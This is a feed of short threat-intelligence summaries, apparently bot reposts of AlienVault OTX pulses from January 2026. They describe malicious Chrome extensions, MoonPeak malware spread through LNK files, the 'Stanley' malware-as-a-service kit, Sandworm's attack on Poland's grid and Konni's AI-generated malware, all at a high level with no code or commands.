Chrome Extensions: Are you getting more than you bargained for?

This analysis reveals the hidden dangers of certain Chrome extensions available on the Google Chrome Web Store. Despite the store's vetting process, some malicious extensions have slipped through, compromising user security. The study examines four examples of extensions with combined user bases exceeding 100,000, showcasing various security risks. These include undisclosed clipboard access to remote domains, data exfiltration, remote code execution capabilities, search hijacking, and cross-site scripting vulnerabilities. The extensions employ tactics such as command-and-control infrastructure with domain generation algorithms, user tracking, and brand impersonation. The research emphasizes the importance of caution when installing browser extensions, even from trusted sources, and recommends immediate uninstallation of the identified malicious extensions.

Pulse ID: 69778aef872cffc134e67ace
Pulse Link: https://otx.alienvault.com/pulse/69778aef872cffc134e67ace
Pulse Author: AlienVault
Created: 2026-01-26 15:40:31

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Chrome #ChromeExtension #Clipboard #CyberSecurity #Google #ICS #InfoSec #OTX #OpenThreatExchange #RAT #RCE #RemoteCodeExecution #Rust #bot #AlienVault

Malware MoonPeak Executed via LNK Files

In January 2026, IIJ observed malicious LNK files targeting Korean users to execute the MoonPeak malware, attributed to North Korean threat actors. The infection chain begins with a LNK file that runs an obfuscated PowerShell script, which checks for analysis environments, creates additional scripts, and sets up persistence. The second stage downloads and executes a payload from GitHub, which is actually the MoonPeak malware. MoonPeak is obfuscated using ConfuserEx and communicates with a C2 server. The campaign utilizes GitHub for hosting malware, a technique known as Living Off Trusted Sites (LOTS). This attack demonstrates the ongoing threat posed by North Korean actors targeting various countries and individuals worldwide.

Pulse ID: 69777a203745e70e7425106f
Pulse Link: https://otx.alienvault.com/pulse/69777a203745e70e7425106f
Pulse Author: AlienVault
Created: 2026-01-26 14:28:48

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #GitHub #InfoSec #Korea #LNK #Malware #NorthKorea #OTX #OpenThreatExchange #PowerShell #RAT #Rust #bot #AlienVault

A $6,000 Russian Malware Toolkit with Chrome Web Store Guarantee

A new malware-as-a-service toolkit called 'Stanley' is being sold on Russian cybercrime forums for $2,000 to $6,000. It provides a turnkey website-spoofing operation disguised as a Chrome extension, with the premium tier promising guaranteed publication on the Chrome Web Store. The toolkit allows full-page website spoofing, element injection, push notifications, and backup domain rotation. It uses victims' IP addresses for tracking and implements a persistent polling mechanism to communicate with the command and control server. The malware's core attack involves website spoofing via iframe overlay, allowing attackers to harvest credentials while displaying legitimate URLs in the browser's address bar.

Pulse ID: 69772b44fe2e1c30ec984e32
Pulse Link: https://otx.alienvault.com/pulse/69772b44fe2e1c30ec984e32
Pulse Author: AlienVault
Created: 2026-01-26 08:52:20

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Chrome #ChromeExtension #CyberCrime #CyberSecurity #InfoSec #Malware #MalwareAsAService #OTX #OpenThreatExchange #RAT #Russia #bot #AlienVault

Sandworm behind cyberattack on Poland's power grid in late 2025

Pulse ID: 6976fb12433099e6fae6af59
Pulse Link: https://otx.alienvault.com/pulse/6976fb12433099e6fae6af59
Pulse Author: Tr1sa111
Created: 2026-01-26 05:26:42

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberAttack #CyberSecurity #InfoSec #OTX #OpenThreatExchange #Poland #RAT #Sandworm #Worm #bot #Tr1sa111

AI-Generated Malware Targets Blockchain Sector

The threat group Konni is targeting blockchain developers and engineers
using AI generated malware delivered through social engineering.

Pulse ID: 697556980d7cb28d19682fd8
Pulse Link: https://otx.alienvault.com/pulse/697556980d7cb28d19682fd8
Pulse Author: cryptocti
Created: 2026-01-24 23:32:40

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BlockChain #CyberSecurity #InfoSec #Konni #Malware #OTX #OpenThreatExchange #RAT #SocialEngineering #bot #developers #cryptocti